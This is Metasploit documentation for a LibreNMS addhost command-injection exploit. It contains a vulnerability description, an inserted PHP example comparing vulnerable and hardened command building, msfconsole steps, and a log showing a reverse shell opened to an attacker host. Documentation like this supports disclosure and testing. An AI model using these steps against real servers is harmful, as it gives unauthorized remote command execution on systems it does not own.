metasploit-gs/documentation/modules/exploit/linux/http/librenms_addhost_cmd_inject.md
2019-05-29 15:51:53 -05:00
## Description
In LibreNMS `v1.46` and below, there exists a command injection vulnerability in `capture.inc.php`.
The vulnerable functionality is intended to run a command such as `snmpwalk` and save the output as
a file. The `community` parameter is taken unsanitized from a POST request to `addhost` and is used to
build the command that the `capture.inc.php` functionality executes. The final command string is passed
to `popen()`, so shell metacharacters in the parameter result in execution of arbitrary commands.
This module has been tested on LibreNMS `v1.46` and `v1.45`.
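An added illustrative example, not LibreNMS's own code, of the pattern the description above explains: a command string built from the untrusted `community` value and destined for `popen()`, beside a hardened version that validates the value and quotes it with `escapeshellarg()`. The function names and parameters are assumptions.

```php
<?php
// Added example, not LibreNMS's own code; function names and parameters are assumptions.

// VULNERABLE pattern: the POST-supplied community string is interpolated into a
// shell command string that is then handed to popen(). Shell metacharacters in
// the value (';', '`', '$(...)') become part of the command the shell runs.
function buildCaptureCommandVulnerable(string $hostname, string $community): string
{
    return "snmpwalk -v2c -c $community $hostname";
}

// Allow-list check: only characters a community string legitimately contains.
// Adjust the character set and length to the deployment's naming policy.
function isValidCommunity(string $community): bool
{
    return (bool) preg_match('/^[A-Za-z0-9_.\-]{1,64}$/', $community);
}

function isValidHostname(string $hostname): bool
{
    return filter_var($hostname, FILTER_VALIDATE_IP) !== false
        || (bool) preg_match('/^[A-Za-z0-9.\-]{1,253}$/', $hostname);
}

// HARDENED: reject malformed input up front, then quote every untrusted argument
// with escapeshellarg() so the shell sees each one as a single literal word.
function buildCaptureCommandSafe(string $hostname, string $community): string
{
    if (!isValidCommunity($community)) {
        throw new InvalidArgumentException('invalid SNMP community string');
    }
    if (!isValidHostname($hostname)) {
        throw new InvalidArgumentException('invalid hostname');
    }
    return 'snmpwalk -v2c -c ' . escapeshellarg($community) . ' ' . escapeshellarg($hostname);
}

// Constructed sample input: a community value with an appended shell command.
$tainted = 'public; echo injected';
// Vulnerable builder: if the returned string reached popen(), "echo injected" would run.
echo buildCaptureCommandVulnerable('192.0.2.10', $tainted), "\n";
// Hardened builder: the same value is rejected before any command string is built.
try {
    echo buildCaptureCommandSafe('192.0.2.10', $tainted), "\n";
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
// A well-formed value passes and is emitted as quoted arguments.
echo buildCaptureCommandSafe('192.0.2.10', 'public'), "\n";
```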
## Vulnerable Application
A [pre-built OVA](https://github.com/librenms/packer-builds/releases/tag/1.46) can be downloaded via a LibreNMS repo.
Additionally, vulnerable versions of LibreNMS for Ubuntu can be manually installed using the instructions [here](https://docs.librenms.org/Installation/Installation-Ubuntu-1804-Apache/).
In the command `composer create-project --no-dev --keep-vcs librenms/librenms librenms dev-master`, replace `dev-master` with a vulnerable version of the software, e.g. `1.46`.
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/librenms_addhost_cmd_inject`
4. Do: `set RHOSTS <ip>`
5. Do: `set USERNAME <user>`
6. Do: `set PASSWORD <pass>`
7. Do: `run`
8. You should get a shell.
## Scenarios
### Tested on LibreNMS 1.46 on Ubuntu 18.04
```
msf5 > use exploit/linux/http/librenms_addhost_cmd_inject
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.37.143
rhosts => 192.168.37.143
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set username blah
username => blah
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set password password
password => password
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > run
[*] Started reverse TCP double handler on 192.168.37.1:4444
[*] Successfully logged into LibreNMS
[+] Successfully added device with hostname dFEzcH
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Successfully deleted device with hostname dFEzcH and id #126
[*] Command: echo 38eJIFZsiRl3Er48;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\n38eJIFZsiRl3Er48\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.143:55380) at 2019-05-29 15:26:02 -0500
whoami
www-data
uname -a
Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
```